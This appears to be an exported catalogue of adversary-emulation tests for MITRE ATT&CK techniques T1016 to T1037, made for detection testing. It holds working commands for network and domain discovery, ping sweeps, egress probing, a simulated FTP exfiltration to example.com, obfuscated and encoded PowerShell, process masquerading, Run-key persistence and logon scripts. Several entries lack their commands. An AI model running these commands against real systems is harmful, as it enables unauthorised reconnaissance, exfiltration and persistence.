Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
T1016 - System Network Configuration Discovery
System Network Configuration Discovery
if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
Description: Identify network configuration information.
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
Prereq: Check if arp command exists on the machine
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
T1016 - System Network Configuration Discovery
System Network Configuration Discovery (TrickBot Style)
ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts
Description: Identify network configuration information as seen by TrickBot, as described at https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout.
T1016 - System Network Configuration Discovery
List Open Egress Ports
$ports = Get-Content "T1016\src\top-128.txt"
$file = "$env:USERPROFILE\Desktop\open-ports.txt"
$totalopen = 0
$totalports = 0
New-Item $file -Force
foreach ($port in $ports) {
  $test = New-Object System.Net.Sockets.TcpClient
  $wait = $test.BeginConnect("allports.exposed", $port, $null, $null)
  $wait.AsyncWaitHandle.WaitOne(250, $false) | Out-Null
  $totalports++ | Out-Null
  if ($test.Connected) {
    $result = "$port open"
    Write-Host -ForegroundColor Green $result
    $result | Out-File -Encoding ASCII -Append $file
    $totalopen++ | Out-Null
  } else {
    $result = "$port closed"
    Write-Host -ForegroundColor Red $result
    $totalclosed++ | Out-Null
    $result | Out-File -Encoding ASCII -Append $file
  }
}
$results = "There were a total of $totalopen open ports out of $totalports ports tested."
$results | Out-File -Encoding ASCII -Append $file
Write-Host $results
Description: This is to test for what ports are open outbound. The technique used was taken from the following blog:
https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/
Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt.
Prereq: Test requires T1016\src\top-128.txt to exist
if (Test-Path "T1016\src\top-128.txt") {exit 0} else {exit 1}
Description: The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects.
References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1016 - System Network Configuration Discovery
Qakbot Recon
"T1016\src\qakbot.bat"
Description: A list of commands known to be performed by Qakbot for recon purposes
Prereq: File to copy must exist on disk at specified location (T1016\src\qakbot.bat)
if (Test-Path "T1016\src\qakbot.bat") {exit 0} else {exit 1}
Description: This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows.
Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration ("Is it on or off?"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user.
Using `socketfilterfw`, flags such as `--getglobalstate` or `--listapps` can be used for similar filtering. At least one flag is required to send parseable output to standard out.
Description: Identify the system's domain controller (via DNS) on an endpoint using an nslookup LDAP query. This technique is abused by Qakbot malware to gather information on the domain
controller of the targeted or compromised host. Reference: https://securelist.com/qakbot-technical-analysis/103931/
T1018 - Remote System Discovery
Remote System Discovery - net
net view /domain
net view
Description: Identify remote systems with net.exe.
Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.
T1018 - Remote System Discovery
Remote System Discovery - net group Domain Computers
net group "Domain Computers" /domain
Description: Identify remote systems with net.exe querying the Active Directory Domain Computers group.
Upon successful execution, cmd.exe will execute net.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
T1018 - Remote System Discovery
Remote System Discovery - nltest
nltest.exe /dclist:%userdnsdomain%
Description: Identify domain controllers for specified domain.
Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
T1018 - Remote System Discovery
Remote System Discovery - ping sweep
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
Description: Identify remote systems via ping sweep.
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
T1018 - Remote System Discovery
Remote System Discovery - arp
arp -a
Description: Identify remote systems via arp.
Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
T1018 - Remote System Discovery
Remote System Discovery - arp nix
arp -a | grep -v '^?'
Description: Identify remote systems via arp.
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
Prereq: Check if arp command exists on the machine
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
T1018 - Remote System Discovery
Remote System Discovery - sweep
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
Description: Identify remote systems via ping sweep.
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
Description: PowerShell script that runs nslookup via cmd.exe against the local /24 network of the first network adapter listed in ipconfig.
Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
Description: This tool enumerates and exports all DNS records in the zone for reconnaissance of internal networks.
Python 3 and adidnsdump must be installed; use the get_prereq_commands to meet the prerequisites for this test.
Successful execution of this test will list DNS zones in the terminal.
Description: The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects.
References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1018 - Remote System Discovery
Adfind - Enumerate Active Directory Domain Controller Objects
"..\ExternalPayloads\AdFind.exe" None -sc dclist
Description: The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects.
References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1018 - Remote System Discovery
Remote System Discovery - ip neighbour
ip neighbour show
Description: Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment.
Prereq: Check if ip command exists on the machine
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
T1018 - Remote System Discovery
Remote System Discovery - ip route
ip route show
Description: Use the ip route command to display the kernel's routing tables.
Prereq: Check if ip command exists on the machine
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
T1018 - Remote System Discovery
Remote System Discovery - netstat
netstat -r | grep default
Description: Use the netstat command to display the kernel's routing tables.
T1018 - Remote System Discovery
Remote System Discovery - ip tcp_metrics
ip tcp_metrics show |grep --invert-match "^127\."
Description: Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses.
Prereq: Check if ip command exists on the machine
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
T1018 - Remote System Discovery
Enumerate domain computers within Active Directory using DirectorySearcher
Description: This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain.
This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement.
Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks).
Upon successful execution, this test will output the names of the computers that reside on the domain to the console window.
Enumerate Active Directory Computers with Get-AdComputer
Get-AdComputer -Filter *
Description: The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
Upon successful execution a listing of Computers will output with their paths in AD.
Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
T1018 - Remote System Discovery
Enumerate Active Directory Computers with ADSISearcher
Description: The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
Upon successful execution a listing of computers will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
Description: Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
Description: The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
Upon successful execution a listing of Systems from AD will output with their paths.
Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
T1018 - Remote System Discovery
Remote System Discovery - net group Domain Controller
net group /domain "Domain controllers"
Description: Identify remote systems with net.exe querying the Active Directory "Domain Controllers" group.
Upon successful execution, cmd.exe will execute net.exe against Active Directory to list the "Domain Controllers" in the domain. Output will be via stdout.
$sampleData = "Sample data for exfiltration test"
Set-Content -Path "C:\temp\T1020__FTP_sample.txt" -Value $sampleData
$ftpUrl = "ftp://example.com"
$creds = Get-Credential -Credential "[user:password]"
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "C:\temp\T1020__FTP_sample.txt" -Credential $creds
Description: Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
Description: Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt.
Disabling NLA for RDP can allow a remote user to interact with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/
See also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py
Description: Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
Prereq: PsExec tool from Sysinternals must exist on disk at specified location (..\ExternalPayloads\PsExec.exe)
if (Test-Path "..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1}
Description: PowerShell lateral movement using the MMC20.Application COM object.
Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
Upon successful execution, cmd will spawn calc.exe on a remote computer.
T1021.003 - Remote Services: Distributed Component Object Model
PowerShell Lateral Movement Using Excel Application Object
Description: PowerShell lateral movement using the Excel Application COM object.
Reference:
https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922
Upon successful execution, cmd will spawn calc.exe on a remote computer.
Description: An adversary enables SSH on an ESXi host to maintain persistence and create another command execution interface.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Prereq: Check if we have plink
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
Description: ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer.
Adversaries can abuse ARD to gain remote code execution and perform lateral movement.
References: https://www.mandiant.com/resources/blog/leveraging-apple-remote-desktop-for-good-and-evil
Description: Simulate lateral movement with PowerShell Remoting on the local host.
Upon successful execution, PowerShell will execute `whoami` using `Invoke-Command`, targeting the
local machine as remote target.
Cleanup:
Disable-PSRemoting -Force
T1021.006 - Remote Services: Windows Remote Management
Description: This test simulates an attack where PowerShell is used to detect connected USB or other removable storage devices and gather a list of specific document files
(e.g., .docx, .xls, .txt, .pdf). The command works by first identifying removable drives on the system and then recursively searching through each one for files
matching the targeted extensions. If no removable drives are present, the script will return a message stating that no media is detected. This behavior mimics
how adversaries might scan for sensitive documents on removable devices for exfiltration or analysis.
T1027.001 - Obfuscated Files or Information: Binary Padding
Pad Binary to Change Hash - Linux/macOS dd
dd if=/dev/zero bs=1 count=1 >> /tmp/evil-binary #adds null bytes
dd if=/dev/random bs=1 count=1 >> /tmp/evil-binary #adds high-quality random data
dd if=/dev/urandom bs=1 count=1 >> /tmp/evil-binary #adds low-quality random data
Description: Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
Prereq: The binary must exist on disk at specified location (/tmp/evil-binary)
if [ -f /tmp/evil-binary ]; then exit 0; else exit 1; fi;
Cleanup:
rm /tmp/evil-binary
T1027.001 - Obfuscated Files or Information: Binary Padding
Pad Binary to Change Hash using truncate command - Linux/macOS
truncate -s +1 /tmp/evil-binary #adds a byte to the file size
Description: Uses truncate to add a byte to the binary to change the hash.
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
Prereq: The binary must exist on disk at specified location (/tmp/evil-binary)
if [ -f /tmp/evil-binary ]; then exit 0; else exit 1; fi;
Cleanup:
rm /tmp/evil-binary
T1027.002 - Obfuscated Files or Information: Software Packing
Description: Copies and then runs a simple binary (which just outputs "the cake is a lie") that was packed by UPX.
No other protection or compression was applied.
Cleanup:
rm /tmp/packed_bin
T1027.002 - Obfuscated Files or Information: Software Packing
Binary packed by UPX, with modified headers (linux)
Description: Copies and then runs a simple binary (which just outputs "the cake is a lie") that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to `0x4c4f5452` ("`LOTR`"). This prevents the binary from being detected
by some methods; in particular, UPX itself is no longer able to decompress it.
Cleanup:
rm /tmp/packed_bin
T1027.002 - Obfuscated Files or Information: Software Packing
Description: Copies and then runs a simple binary (which just outputs "the cake is a lie") that was packed by UPX.
No other protection or compression was applied.
Cleanup:
rm /tmp/packed_bin
T1027.002 - Obfuscated Files or Information: Software Packing
Description: Copies and then runs a simple binary (which just outputs "the cake is a lie") that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to `0x4c4f5452` ("`LOTR`"). This prevents the binary from being detected
by some methods; in particular, UPX itself is no longer able to decompress it.
Cleanup:
rm /tmp/packed_bin
T1027.004 - Obfuscated Files or Information: Compile After Delivery
Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
The exe file that will be executed, T1027.004_DynamicCompile.exe, is contained in the 'bin' folder of this atomic, and its source code is in the 'src' folder.
Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
Prereq: exe file must exist on disk at specified location (T1027.004\bin\T1027.004_DynamicCompile.exe)
if (Test-Path "T1027.004\bin\T1027.004_DynamicCompile.exe") {exit 0} else {exit 1}
T1027.004 - Obfuscated Files or Information: Compile After Delivery
Description: Compile a C file with either gcc or clang on FreeBSD, Linux or macOS.
Prereq: the source file must exist on disk at specified location (T1027.004/src/T1027-004-test.cc)
if [ -e T1027.004/src/T1027-004-test.cc ]; then exit 0; else exit 1; fi
T1027.004 - Obfuscated Files or Information: Compile After Delivery
Go compile
go run T1027.004/src/T1027-004-test.go
Description: Compile a Go file with the Go toolchain on FreeBSD, Linux or macOS.
Prereq: the source file must exist on disk at specified location (T1027.004/src/T1027-004-test.go)
if [ -e T1027.004/src/T1027-004-test.go ]; then exit 0; else exit 1; fi
T1027.006 - HTML Smuggling
HTML Smuggling Remote Payload
& "T1027.006\bin\T1027_006_remote.html"
Description: The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without user interaction.
The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
Prereq: T1027_006_remote.html must exist on disk at the specified location (PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html)
if (Test-Path "T1027.006\bin\T1027_006_Remote.html") { exit 0} else { exit 1}
Description: This test calls NtCreateFile via API hashing and dynamic syscall resolution. I have dubbed this particular combination of techniques 'Ninja-syscall'. When successful, a new file named 'hello.log' will be created in the default user's temporary folder, which is a common location for a dropper.
Prereq: Portable Executable to run must exist at specified location (T1027.007\bin\ninja_syscall1.exe)
if (Test-Path "T1027.007\bin\ninja_syscall1.exe") {exit 0} else {exit 1}
Description: Creates a base64-encoded data file and decodes it into an executable shell script.
Upon successful execution, sh will execute art.sh, a base64-encoded command that echoes `Hello from the Atomic Red Team`
and runs `uname -v`.
Prereq: The command must be encoded into a base64 file (/tmp/encoded.dat)
if [ -e "/tmp/encoded.dat" ]; then exit 0; else exit 1; fi
Description: Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
Upon successful execution, powershell will execute an encoded command; the default stdout is `Hey, Atomic!` (from `Write-Host "Hey, Atomic!"`).
T1027 - Obfuscated Files or Information
Execute base64-encoded PowerShell from Windows Registry
Description: Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.
Upon successful execution, powershell will execute encoded command and read/write from the registry.
Description: Upon successful execution, an Excel file containing a VBA macro with sensitive data will be sent outside the network using email.
The sensitive data consists of around 20 simulated credit card numbers that pass the Luhn check.
T1027 - Obfuscated Files or Information
DLP Evasion via Sensitive Data in VBA Macro over HTTP
Invoke-WebRequest -Uri 127.0.0.1 -Method POST -Body "T1027\src\T1027-cc-macro.xlsm"
Description: Upon successful execution, an Excel file containing a VBA macro with sensitive data will be sent outside the network using HTTP.
The sensitive data consists of around 20 simulated credit card numbers that pass the Luhn check.
Description: This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
T1027 - Obfuscated Files or Information
Obfuscated Command Line using special Unicode characters
{MISSING IN ATOMIC RED TEAM}
Description: This is an obfuscated certutil command that, when executed, downloads a file from the web. Adapted from T1105. Obfuscation includes special option characters (Unicode hyphens), character substitution (e.g. ᶠ) and character insertion (including the use of the right-to-left 0x202E and left-to-right 0x202D override characters).
Reference:
https://wietze.github.io/blog/windows-command-line-obfuscation
Description: The following Atomic Test creates a file with a specific name and sets its attributes to Hidden, System, and Archive. This relates to the Snake Malware campaign, in which the file is later decrypted by Snake's kernel driver.
[Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)
Description: Mimic execution of compressed JavaScript file. When successfully executed, calculator.exe will open. This test is meant to help emulate Gootloader as per https://redcanary.com/blog/gootloader/
Prereq: T1027js.js must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js
if (Test-Path "..\ExternalPayloads\temp_T1027js.zip\T1027js.js") {exit 0} else {exit 1}
Cleanup:
taskkill /f /im calculator.exe >nul 2>nul
T1030 - Data Transfer Size Limits
Data Transfer Size Limits
cd /tmp/T1030; split -b 5000000 T1030_urandom
ls -l /tmp/T1030
Description: Take a file/directory, split it into 5Mb chunks
Prereq: The file must exist for the test to run.
if [ ! -f /tmp/T1030/T1030_urandom ]; then exit 1; else exit 0; fi;
Cleanup:
if [ -f /tmp/T1030/safe_to_delete ]; then rm -rf /tmp/T1030; fi;
Description: Simulate transferring data over a network in small chunks to evade detection.
T1033 - System Owner/User Discovery
System Owner/User Discovery
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"localhost"
quser
qwinsta.exe /server:localhost
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:localhost ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
Description: Identify System owner or users on an endpoint.
Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout.
Additionally, two files will be written to disk - computers.txt and usernames.txt.
T1033 - System Owner/User Discovery
System Owner/User Discovery
users
w
who
Description: Identify System owner or users on an endpoint
Upon successful execution, sh will print a list of usernames to stdout.
T1033 - System Owner/User Discovery
Find computers where user has session - Stealth mode (PowerView)
Description: SocGholish performs whoami discovery commands and outputs the results to a tmp file.
The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.
Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
Cleanup:
Remove-Item -Path $env:temp\rad*.tmp -Force
T1033 - System Owner/User Discovery
System Owner/User Discovery Using Command Prompt
set file=$env:temp\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
Description: Identify the system owner or current user using native Windows command prompt utilities.
Description: Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, the test will hang until the 120 second timeout cancels the session.
Description: Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
Upon successful execution, sh is renamed to `crond` and executed.
Description: Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.
Upon successful execution, cscript.exe is renamed as notepad.exe and executed from a non-standard path.
Description: Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
Upon execution, no windows will remain open, but wscript will have been renamed to svchost and run from the temp folder.
Prereq: Wscript file to execute must exist on disk
if (Test-Path "..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") {exit 0} else {exit 1}
Cleanup:
del /Q /F %APPDATA%\svchost.exe >nul 2>&1
T1036.003 - Masquerading: Rename System Utilities
Masquerading - powershell.exe running as taskhostw.exe
Description: Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.
Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from a non-standard path.
Cleanup:
del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
T1036.003 - Masquerading: Rename System Utilities
Masquerading - non-windows exe running as windows exe
Description: Copies an exe, renames it as a Windows exe, and launches it to masquerade as a real Windows exe.
Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from a non-standard path.
Prereq: Exe file to copy must exist on disk at specified location (T1036.003\bin\T1036.003.exe)
if (Test-Path "T1036.003\bin\T1036.003.exe") {exit 0} else {exit 1}
Description: Detect LSM running from an incorrect directory and an incorrect service account
This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder.
Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from a non-standard path.
Cleanup:
del C:\T1036.003.txt >nul 2>&1
del C:\lsm.exe >nul 2>&1
T1036.004 - Masquerading: Masquerade Task or Service
Creating W32Time similar named service using schtasks
Description: Creates a service with a name similar to W32Time (win32times) using sc, just like the threat actor activity dubbed "Operation Wocao".
Cleanup:
sc delete win32times
T1036.004 - Masquerading: Masquerade Task or Service
linux rename /proc/pid/comm using prctl
/tmp/T1036_004_prctl_rename &
ps
TMP=`ps | grep totally_legit`
if [ -z "${TMP}" ] ; then echo "renamed process NOT FOUND in process list" && exit 1; fi
exit 0
Description: Runs a C program that calls prctl(PR_SET_NAME) to modify the /proc/pid/comm value to "totally_legit". This will show up as the process name in simple 'ps' listings.
Prereq: /tmp/T1036_004_prctl_rename must exist on the system.
stat /tmp/T1036_004_prctl_rename
Cleanup:
rm -f /tmp/T1036_004_prctl_rename
T1036.004 - Masquerading: Masquerade Task or Service
T1036.005 - Masquerading: Match Legitimate Name or Location
Execute a process from a directory masquerading as the current parent directory
mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo Hello from the Atomic Red Team test T1036.005#1"
Description: Create and execute a process from a directory masquerading as the current parent directory (`...` instead of the normal `..`).
Cleanup:
rm -f $HOME/.../sh
rmdir $HOME/.../
T1036.005 - Masquerading: Match Legitimate Name or Location
Masquerade as a built-in system executable
Add-Type -TypeDefinition @'
public class Test {
    public static void Main(string[] args) {
        System.Console.WriteLine("tweet, tweet");
    }
}
'@ -OutputAssembly "$Env:windir\Temp\svchost.exe"
T1036.005 - Masquerading: Match Legitimate Name or Location
Masquerading cmd.exe as VEDetector.exe
# Copy and rename cmd.exe to VEDetector.exe
Copy-Item -Path "$env:SystemRoot\System32\cmd.exe" -Destination "$env:TEMP\VEDetector.exe" -Force
# Create registry run key for persistence
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "$env:TEMP\VEDetector.exe" -PropertyType String -Force
# Start the renamed process
Start-Process -FilePath "$env:TEMP\VEDetector.exe"
Start-Sleep -Seconds 5
Description: This test simulates an adversary renaming cmd.exe to VEDetector.exe to masquerade as a legitimate application.
The test copies cmd.exe, renames it to VEDetector.exe, adds a registry run key for persistence, and executes the renamed binary.
This technique may be used to evade detection by mimicking legitimate software names or locations.
**Expected Output:**
- A new process named VEDetector.exe appears in the process list, but its behavior matches cmd.exe.
- SIEM/EDR systems may detect this as suspicious process activity (e.g., Sysmon Event ID 1 for process creation, or Event ID 13 for registry modifications).
- Registry modification in HKLM:\Software\Microsoft\Windows\CurrentVersion\Run may trigger persistence alerts in XDR platforms.
**References:**
- [MITRE ATT&CK T1036.005](https://attack.mitre.org/techniques/T1036/005/)
- [Sysmon Process Creation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)
Prereq: The source cmd.exe file must exist on the system.
Description: Download and execute a file masquerading as an image or Office file. Upon execution, 3 calc instances and 3 vbs windows will be launched.
e.g. SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quarterlyreport.docx.exe)
Prereq: File to copy must exist on disk at specified location (T1036.007\src\T1036.007_masquerading.vbs)
if (Test-Path "T1036.007\src\T1036.007_masquerading.vbs") {exit 0} else {exit 1}
Prereq: File to copy must exist on disk at specified location (T1036.007\src\T1036.007_masquerading.ps1)
if (Test-Path "T1036.007\src\T1036.007_masquerading.ps1") {exit 0} else {exit 1}
Cleanup:
del /f %temp%\T1036.007_masquerading.docx.exe > nul 2>&1
del /f %temp%\T1036.007_masquerading.pdf.exe > nul 2>&1
del /f %temp%\T1036.007_masquerading.ps1.exe > nul 2>&1
del /f %temp%\T1036.007_masquerading.xls.vbs > nul 2>&1
del /f %temp%\T1036.007_masquerading.xlsx.vbs > nul 2>&1
del /f %temp%\T1036.007_masquerading.png.vbs > nul 2>&1
del /f %temp%\T1036.007_masquerading.doc.ps1 > nul 2>&1
del /f %temp%\T1036.007_masquerading.pdf.ps1 > nul 2>&1
del /f %temp%\T1036.007_masquerading.rtf.ps1 > nul 2>&1
Description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
Description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
Prereq: Zip file must be present.
if (Test-Path "..\ExternalPayloads\T1036.zip") {exit 0} else {exit 1}
T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)
Logon Scripts
echo "echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt" > %temp%\art.bat
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "%temp%\art.bat" /f
Description: Adds a registry value to run a batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
that can be viewed in the Registry Editor.
Cleanup:
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
del %temp%\art.bat >nul 2>&1
del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1
T1037.002 - Boot or Logon Initialization Scripts: Logon Script (Mac)
Logon Scripts - Mac
{MISSING IN ATOMIC RED TEAM}
Description: Mac logon script
T1037.004 - Boot or Logon Initialization Scripts: Rc.common
Description: Modify or create a file in /Library/StartupItems
[Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)
Cleanup:
sudo rm /Library/StartupItems/EvilStartup.plist
T1037.005 - Boot or Logon Initialization Scripts: Startup Items
Description: Add launch script to /Library/StartupItems to launch agent
[Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
Prereq: /Library/StartupItems must exist
if [ ! -d /Library/StartupItems ]; then mkdir /Library/StartupItems; exit 0; fi;
Prereq: The shared library must exist on disk at specified location ($T1037.005/src/T1037_005_daemon.plist)
if [ -f $T1037.005/src/T1037_005_daemon.plist ]; then exit 0; else exit 1; fi;
Prereq: The startup script must exist on disk at specified location ($T1037.005/src/T1037.005_daemon.sh)
if [ -f $T1037.005/src/T1037.005_daemon.sh ]; then exit 0; else exit 1; fi;
Description: Add launch script to /Library/StartupItems to launch agent
[Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
Prereq: /Library/StartupItems must exist
if [ ! -d /Library/StartupItems ]; then mkdir /Library/StartupItems; exit 0; fi;
Prereq: The shared library must exist on disk at specified location ($T1037.005/src/T1037_005_agent.plist)
if [ -f $T1037.005/src/T1037_005_agent.plist ]; then exit 0; else exit 1; fi;
